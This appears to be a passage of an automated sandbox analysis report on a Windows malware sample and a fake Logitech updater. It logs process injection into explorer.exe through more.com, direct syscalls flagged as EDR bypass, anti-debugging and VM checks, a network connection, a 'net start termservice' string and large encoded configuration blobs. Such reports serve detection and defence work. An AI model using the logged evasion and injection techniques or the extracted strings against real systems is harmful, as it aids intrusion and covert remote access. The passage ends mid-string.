                    Source: C:\Windows\SysWOW64\explorer.exe TID: 2504Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0079ED13 FindFirstFileExW,14_2_0079ED13
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007693D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW,14_2_007693D0
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000Jump to behavior
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                    Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007D8A00 rdtsc 14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0078A195
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeCode function: 0_2_0079A032 mov eax, dword ptr fs:[00000030h]0_2_0079A032
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007D8A00 mov eax, dword ptr fs:[00000030h]14_2_007D8A00
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078DB50 mov eax, dword ptr fs:[00000030h]14_2_0078DB50
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00795D42 mov eax, dword ptr fs:[00000030h]14_2_00795D42
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0078A195
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078E87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0078E87C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007898A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_007898A8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00767EB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,14_2_00767EB0
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeNtProtectVirtualMemory: Direct from: 0x6E5D2C38Jump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeNtProtectVirtualMemory: Direct from: 0x6E5B2D04Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeNtSetInformationThread: Direct from: 0x79ACD3Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeNtQuerySystemInformation: Direct from: 0x517AFFJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeNtProtectVirtualMemory: Direct from: 0x6C86214EJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeNtSetTimerEx: Direct from: 0x76EF7B2EJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeNtQueryInformationToken: Direct from: 0x6C6980B4Jump to behavior
                    Injects code into the Windows Explorer (explorer.exe)
                    Source: C:\Windows\SysWOW64\more.comMemory written: PID: 4348 base: B079C0 value: 55Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: PID: 4348 base: 9F0008 value: 00Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: PID: 3492 base: B079C0 value: 55Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: PID: 3492 base: 3129008 value: 00Jump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: B079C0Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 9F0008Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: B079C0Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 3129008Jump to behavior
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0078A37F cpuid 14_2_0078A37F
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,14_2_007A222E
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_007A2354
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,14_2_007A245A
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,14_2_0079842E
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_007A2529
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,14_2_007A1BC8
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,14_2_007A1DC3
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,14_2_007A1E6A
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,14_2_007A1EB5
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,14_2_007A1F50
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: EnumSystemLocalesW,14_2_00797F0C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_007A1FDB
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9c813d63 VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bca94d0c VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeQueries volume information: C:\Users\user\AppData\Local\Temp\be3cb5d2 VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,14_2_0076E8D0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0077F060 Sleep,RegOpenKeyExA,RegCloseKey,GetUserNameA,GetModuleFileNameA,14_2_0077F060
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0079E430 _free,_free,_free,GetTimeZoneInformation,_free,14_2_0079E430
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_007691B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,14_2_007691B0
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Remote Access Functionality

                    barindex
                    Contains functionality to start a terminal service
                    Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                    Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
                    Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                    Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
                    Source: explorer.exeString found in binary or memory: net start termservice
                    Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: net start termservice
                    Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
                    Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: net start termservice
                    Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 